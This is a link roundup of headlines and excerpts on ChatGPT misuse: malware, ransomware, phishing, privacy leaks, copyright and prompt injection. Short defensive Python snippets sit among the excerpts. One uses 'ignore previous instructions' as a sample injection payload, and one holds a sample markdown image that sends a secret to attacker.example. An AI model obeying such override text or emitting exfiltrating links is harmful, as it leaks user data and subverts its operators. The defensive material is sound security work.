ChatGPT-aided ransomware in China results in four arrests as AI raises cybersecurity concerns | South China Morning Post
Things are about to get a lot worse for Generative AI
A full spectrum of infringement
The cat is out of the bag: generative AI systems like DALL-E and ChatGPT have been trained on copyrighted materials; OpenAI, despite its name, has not been transparent about what its models were trained on. Generative AI systems are fully capable of producing materials that infringe copyright. They do not inform users when they do so, and they provide no information about the provenance of the images they produce. Users may not know, for any given image they generate, whether they are infringing.
The Times Sues OpenAI and Microsoft Over A.I. Use of Copyrighted Work
Millions of articles from The New York Times were used to train chatbots that now compete with it, the lawsuit said.
Personal Information Exploit on OpenAI’s ChatGPT Raises Privacy Concerns
Last month, I received an alarming email from someone I did not know: Rui Zhu, a Ph.D. candidate at Indiana University Bloomington. Mr. Zhu had my email address, he explained, because GPT-3.5 Turbo, one of the latest and most robust large language models (L.L.M.) from OpenAI, had delivered it to him.
A Closer Look at ChatGPT's Role in Automated Malware Creation
As the use of ChatGPT and other artificial intelligence (AI) technologies becomes more widespread, it is important to consider the possible risks associated with their use. One of the main concerns surrounding these technologies is the potential for malicious use, such as in the development of malware or other harmful software. Our recent reports discussed how cybercriminals are misusing the large language model’s (LLM) advanced capabilities: We discussed how ChatGPT can be abused to scale manual and time-consuming processes in cybercriminals’ attack chains in virtual kidnapping schemes. We also reported on how this tool can be used to automate certain processes in harpoon whaling attacks to discover “signals” or target categories.
Microsoft Temporarily Blocked Internal Access to ChatGPT, Citing Data Concerns
The company later restored access to the chatbot, which is owned by OpenAI.
AI companies have all kinds of arguments against paying for copyrighted content
The biggest companies in AI aren’t interested in paying to use copyrighted material as training data, and here are their reasons why.
ChatGPT fails in languages like Tamil and Bengali
Outside of English, ChatGPT makes up words, fails logic tests, and can't do basic information retrieval.
Don’t you (forget NLP): Prompt injection with control characters in ChatGPT
Like many companies, Dropbox has been experimenting with large language models (LLMs) as a potential backend for product and research initiatives. As interest in leveraging LLMs has increased in recent months, the Dropbox Security team has been advising on measures to harden internal Dropbox infrastructure for secure usage in accordance with our AI principles. In particular, we’ve been working to mitigate abuse of potential LLM-powered products and features via user-controlled input.
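One class of mitigation the Dropbox team describes is hardening user-controlled input before it reaches a model. A minimal sketch of that idea, stripping ASCII control characters (which have been shown to confuse LLMs) from user text before prompt templating; the function names and prompt template are illustrative, not Dropbox's actual code:

```python
import re

# Strip C0 control characters (and DEL) except tab and newline, so that
# payloads built from backspaces, carriage returns, etc. are neutralized
# before the text is interpolated into an LLM prompt.
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b-\x1f\x7f]")

def sanitize_user_input(text: str) -> str:
    return CONTROL_CHARS.sub("", text)

def build_prompt(user_question: str) -> str:
    # Hypothetical prompt template; any real system would add more context.
    safe = sanitize_user_input(user_question)
    return f"Answer the user's question.\n\nQuestion: {safe}"

# A backspace-laden injection attempt is flattened to plain text.
payload = "ignore previous instructions" + "\x08" * 10
print(build_prompt(payload))
```

Filtering is only one layer; the Dropbox post treats it as part of broader defense-in-depth for LLM-powered features.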
WormGPT - The Generative AI Tool Cybercriminals Are Using to Launch BEC Attacks
In this blog post, we'll look at the use of generative AI, including OpenAI's ChatGPT, and the cybercrime tool WormGPT, in BEC attacks.
WormGPT: New AI Tool Allows Cybercriminals to Launch Sophisticated Cyber Attacks
A new generative AI cybercrime tool called WormGPT is making waves in underground forums. It empowers cybercriminals to automate phishing attacks.
ChatGPT creates mutating malware that evades detection by EDR
A global sensation since its initial release at the end of last year, ChatGPT's popularity among consumers and IT professionals alike has stirred up cybersecurity nightmares about how it can be used to exploit system vulnerabilities. A key problem, cybersecurity experts have demonstrated, is the ability of ChatGPT and other large language models (LLMs) to generate polymorphic, or mutating, code to evade endpoint detection and response (EDR) systems.
ChatGPT Plugins: Data Exfiltration via Images & Cross Plugin Request Forgery
Plugins can return malicious content and hijack your AI.
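The image-exfiltration technique works by having hijacked model output emit a markdown image whose URL smuggles chat data to an attacker-controlled server when the client renders it. A hedged sketch of one common renderer-side mitigation, dropping images that point at non-allowlisted hosts; the allowlist and helper names are illustrative, not any product's actual API:

```python
import re

# Hosts the chat client is allowed to fetch images from (example value).
ALLOWED_HOSTS = {"chat.example.com"}

# Matches markdown images: ![alt](http(s)://host/path) ; group 2 is the host.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://([^/)\s]+)[^)]*)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Replace images on non-allowlisted hosts with a placeholder."""
    def repl(m: re.Match) -> str:
        host = m.group(2).lower()
        return m.group(0) if host in ALLOWED_HOSTS else "[image removed]"
    return MD_IMAGE.sub(repl, markdown)

evil = "Summary done. ![x](https://attacker.example/log?q=SECRET)"
print(strip_untrusted_images(evil))  # the exfiltration URL never renders
```

Blocking the rendering step closes the covert channel even when the model itself has been successfully injected.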
“FleeceGPT” mobile apps target AI-curious to rake in cash
Interest in OpenAI’s latest version of its interactive language model has spurred a new wave of scam apps looking to cash in on the hype
OpenAI’s regulatory troubles are just beginning
OpenAI managed to appease Italian data authorities and lift the country’s effective ban on ChatGPT last week, but its fight against European regulators is far from over.
Bad Actors Are Joining the AI Revolution: Here’s What We’ve Found in the Wild
Follow security researchers as they uncover malicious packages on open-source registries, trace bad actors to Discord, and unveil AI-assisted code.
AI-Powered 'BlackMamba' Keylogging Attack Evades Modern EDR Security
Researchers warn that polymorphic malware created with ChatGPT and other LLMs will force a reinvention of security automation.
Samsung Fab Workers Leak Confidential Data While Using ChatGPT
Samsung fab personnel reportedly used ChatGPT to optimize operations and create presentations, leaking confidential data to the third-party AI.
The criminal use of ChatGPT – a cautionary tale about large language models
In response to the growing public attention given to ChatGPT, the Europol Innovation Lab organised a number of workshops with subject matter experts from across Europol to explore how criminals can abuse large language models (LLMs) such as ChatGPT, as well as how it may assist investigators in their daily work.
Privacy Violations Shutdown OpenAI ChatGPT and Beg Investigation
For much of March 20th, ChatGPT displayed a giant orange warning at the top of its interface saying it was unable to load chat history.
BlackMamba ChatGPT Polymorphic Malware | A Case of Scareware or a Wake-up Call for Cyber Security?
The rise of publicly accessible AI models like ChatGPT has produced some interesting attempts to create malware. How seriously should defenders take them?
"Fobo" Trojan distributed as ChatGPT client for Windows
Attackers are distributing malware disguised as a ChatGPT desktop client for Windows, offering “precreated accounts.”
The Growing Threat of ChatGPT-Based Phishing Attacks
Cyble analyzes how threat actors are using the recent buzz around ChatGPT to launch phishing attacks using various methods.
IoC detection experiments with ChatGPT
We decided to check what ChatGPT already knows about threat research and whether it can help with identifying simple adversary tools and classic indicators of compromise, such as well-known malicious hashes and domains.
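The "classic indicators of compromise" mentioned here are things like known-bad file hashes and domains. A minimal sketch of what such IoC matching looks like in practice, so it is clear what the researchers were asking ChatGPT to reproduce; the hash and domain lists below are illustrative placeholders, not real threat intelligence:

```python
import hashlib

# Placeholder IoC feeds (the hash shown is simply SHA-256 of an empty file,
# used here only so the example is verifiable; these are NOT real IoCs).
KNOWN_BAD_SHA256 = {
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
KNOWN_BAD_DOMAINS = {"malicious.example", "c2.example"}

def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def match_iocs(file_bytes: bytes, contacted_domains: list) -> dict:
    """Report which classic IoCs (bad hash, bad domains) a sample matches."""
    return {
        "bad_hash": sha256_of(file_bytes) in KNOWN_BAD_SHA256,
        "bad_domains": sorted(set(contacted_domains) & KNOWN_BAD_DOMAINS),
    }

print(match_iocs(b"", ["c2.example", "benign.example"]))
```

Deterministic lookups like this are trivial for conventional tooling; the open question in the experiments was whether an LLM could do the same reliably from memory.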
OPWNAI : Cybercriminals Starting to Use ChatGPT
At the end of November 2022, OpenAI released ChatGPT, the new interface for its Large Language Model (LLM), which instantly created a flurry of interest in AI and its possible uses. However, ChatGPT has also added some spice to the modern cyber threat landscape as it quickly became apparent that code generation can help less-skilled threat actors effortlessly launch cyberattacks. In Check Point Research’s (CPR) previous blog, we described how ChatGPT successfully conducted a full infection flow, from creating a convincing spear-phishing email to running a reverse shell, capable of accepting commands in English. The question at hand is whether this is just a hypothetical threat or if there are already threat actors using OpenAI technologies for malicious purposes. CPR’s analysis of several major underground hacking communities shows that there are already first instances of cybercriminals using OpenAI to develop malicious tools. As we suspected, some of the cases clearly showed that many cybercriminals using OpenAI have no development skills at all. Although the tools that we present in this report are pretty basic, it’s only a matter of time until more sophisticated threat actors enhance the way they use AI-based tools for bad.
Armed With ChatGPT, Cybercriminals Build Malware And Plot Fake Girl Bots
Users of underground forums start sharing malware coded by OpenAI’s viral sensation and dating scammers are planning on creating convincing fake girls with the tool. Cyber prognosticators predict more malicious use of ChatGPT is to come.